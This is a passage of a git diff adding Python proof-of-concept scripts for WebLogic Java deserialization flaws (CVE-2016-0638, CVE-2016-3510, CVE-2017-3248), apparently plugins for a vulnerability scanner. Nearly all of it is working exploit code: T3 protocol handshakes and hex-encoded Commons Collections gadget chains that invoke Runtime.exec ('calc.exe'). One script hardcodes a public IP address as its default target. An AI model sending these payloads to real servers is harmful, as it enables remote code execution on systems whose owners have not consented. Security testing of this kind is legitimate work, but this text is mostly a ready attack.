ac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + + totallength = len(chunk1) + len(chunk2) + len(chunk3) + + len_hex = hex(totallength) + + len_hex = len_hex.replace('0x', '0') + + + s1 = len_hex[:2] + s2 = len_hex[2:4] + len_hex = unhexlify(s1 + s2) + + chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + + + payload = chunk1 + chunk2 + chunk3 + + + payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) + + sock.send(payload) + response = sock.recv(15000) + print(("[*]测试返回内容为{}".format(response))) + +if __name__ == '__main__': + run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2016_0638.py b/plugins/weblogic_poc/CVE_2016_0638.py new file mode 100644 index 0000000..4a17445 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2016_0638.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2016-0638'] +PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] +VER_SIG=['weblogic.jms.common.StreamMessageImpl'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '222.85.76.240' + rport = 80 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2016_3510.py b/plugins/weblogic_poc/CVE_2016_3510.py new file mode 100644 index 0000000..8813f5a --- /dev/null +++ b/plugins/weblogic_poc/CVE_2016_3510.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2016-3510'] +PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] +VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2017_3248.py b/plugins/weblogic_poc/CVE_2017_3248.py new file mode 100644 index 0000000..c9d5149 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2017_3248.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2017-3248'] +PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a617